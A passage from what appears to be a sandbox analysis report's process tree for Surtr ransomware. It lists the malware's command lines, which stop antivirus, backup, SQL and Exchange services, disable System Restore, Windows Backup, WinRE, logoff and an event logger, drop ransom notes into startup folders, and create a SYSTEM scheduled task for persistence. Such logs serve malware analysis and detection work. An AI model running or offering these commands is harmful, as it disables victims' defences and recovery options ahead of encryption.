        5⤵
        
        PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:2920
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    3⤵
    PID:2636
  - - C:\Windows\system32\net.exe
      net stop "macmnsvc"
      4⤵
      PID:1320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "macmnsvc"
        5⤵
        
        PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:2904
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "masvc"
    3⤵
    PID:3068
  - - C:\Windows\system32\net.exe
      net stop "masvc"
      4⤵
      PID:2148
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "masvc"
        5⤵
        
        PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:3008
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
      4⤵
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    3⤵
    PID:2560
  - - C:\Windows\system32\net.exe
      net stop "MBAMService"
      4⤵
      PID:2388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBAMService"
        5⤵
        
        PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:2984
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:2644
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
      4⤵
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    3⤵
    PID:2404
  - - C:\Windows\system32\net.exe
      net stop "MBEndpointAgent"
      4⤵
      PID:632
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MBEndpointAgent"
        5⤵
        
        PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:2500
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
      4⤵
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    3⤵
    PID:1604
  - - C:\Windows\system32\net.exe
      net stop "McAfeeEngineService"
      4⤵
      PID:964
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeEngineService"
        5⤵
        
        PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:2772
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
      4⤵
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2944
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    3⤵
    PID:1308
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFramework"
      4⤵
      PID:976
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFramework"
        5⤵
        
        PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1972
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:576
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:240
  - - C:\Windows\system32\net.exe
      net stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
        5⤵
        
        PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "McShield"
    3⤵
    PID:1708
  - - C:\Windows\system32\net.exe
      net stop "McShield"
      4⤵
      PID:856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "McShield"
        5⤵
        
        PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:2192
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
      4⤵
      PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfemms"
    3⤵
    PID:1732
  - - C:\Windows\system32\net.exe
      net stop "mfemms"
      4⤵
      PID:2352
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfemms"
        5⤵
        
        PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2212
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:2420
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1464
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
      4⤵
      PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mfevtp"
    3⤵
    PID:1680
  - - C:\Windows\system32\net.exe
      net stop "mfevtp"
      4⤵
      PID:1772
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mfevtp"
        5⤵
        
        PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2948
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:2812
  - - C:\Windows\system32\net.exe
      net stop "VeeamRESTSvc"
      4⤵
      PID:2524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamRESTSvc"
        5⤵
        
        PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2764
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
      4⤵
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MMS"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "MMS"
      4⤵
      PID:1736
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MMS"
        5⤵
        
        PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2516
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
      4⤵
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
    3⤵
    PID:2480
  - - C:\Windows\system32\net.exe
      net stop "mozyprobackup"
      4⤵
      PID:1600
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "mozyprobackup"
        5⤵
        
        PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:992
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
      4⤵
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
    3⤵
    PID:2452
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer"
      4⤵
      PID:544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer"
        5⤵
        
        PID:364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:2076
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
      4⤵
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
    3⤵
    PID:2028
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer100"
      4⤵
      PID:2928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer100"
        5⤵
        
        PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:2356
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
      4⤵
      PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
    3⤵
    PID:2392
  - - C:\Windows\system32\net.exe
      net stop "MsDtsServer110"
      4⤵
      PID:2564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MsDtsServer110"
        5⤵
        
        PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
    3⤵
    PID:2444
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeES"
      4⤵
      PID:980
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeES"
        5⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
    3⤵
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
    3⤵
    PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
    3⤵
    - Drops startup file
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
    3⤵
    PID:624
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeIS"
      4⤵
      PID:380
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeIS"
        5⤵
        
        PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
    3⤵
    - Drops startup file
    PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMGMT"
      4⤵
      PID:272
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMGMT"
        5⤵
        
        PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
    3⤵
    PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
    3⤵
    PID:776
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeMTA"
      4⤵
      PID:1592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        5⤵
        
        PID:908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
    3⤵
    PID:956
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSA"
      4⤵
      PID:3052
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSA"
        5⤵
        
        PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
    3⤵
    PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
    3⤵
    PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
    3⤵
    PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
    3⤵
    PID:740
  - - C:\Windows\system32\net.exe
      net stop "MSExchangeSRS"
      4⤵
      PID:220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeSRS"
        5⤵
        
        PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
    3⤵
    PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    3⤵
    PID:1876
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\ProgramData\Service"
      4⤵
      Views/modifies file attributes
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
    3⤵
    PID:2260
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SQL_2008"
      4⤵
      PID:2220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
        5⤵
        
        PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:2748
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:1112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
        5⤵
        
        PID:1860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
    3⤵
    PID:2648
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPS"
      4⤵
      PID:2232
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPS"
        5⤵
        
        PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
    3⤵
    PID:2744
  - - C:\Windows\system32\net.exe
      net stop "MSOLAP$TPSAMA"
      4⤵
      PID:2096
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
        5⤵
        
        PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:2228
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$BKUPEXEC"
      4⤵
      PID:2624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
        5⤵
        
        PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
    3⤵
    PID:520
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$ECWDB2"
      4⤵
      PID:452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
        5⤵
        
        PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
    3⤵
    PID:2908
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTICEMGT"
      4⤵
      PID:1696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
        5⤵
        
        PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:1480
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PRACTTICEBGC"
      4⤵
      PID:960
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
        5⤵
        
        PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:2688
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:2544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
        5⤵
        
        PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:2344
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SBSMONITORING"
      4⤵
      PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
    3⤵
    PID:1768
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQL_2008"
      4⤵
      PID:1564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
        5⤵
        
        PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:2152
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:900
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
    3⤵
    PID:2204
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPS"
      4⤵
      PID:2700
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPS"
        5⤵
        
        PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
    3⤵
    PID:2160
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPSAMA"
      4⤵
      PID:2920
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
        5⤵
        
        PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:2900
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2548
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:2408
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:2056
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Creates scheduled task(s)
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:2348
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:3008
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
    3⤵
    PID:2984
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:2692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:2560
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:2296
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
        5⤵
        
        PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:2064
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:632
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
        5⤵
        
        PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:2100
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:2500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
        5⤵
        
        PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:2772
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:2120
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
        5⤵
        
        PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:2116
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:1604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
        5⤵
        
        PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:1284
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:652
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
        5⤵
        
        PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:976
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:1308
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
        5⤵
        
        PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
    3⤵
    PID:576
  - - C:\Windows\system32\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:2932
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
